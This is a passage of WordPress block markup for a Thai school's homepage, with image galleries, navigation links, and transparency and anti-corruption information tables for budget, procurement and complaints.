{\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift 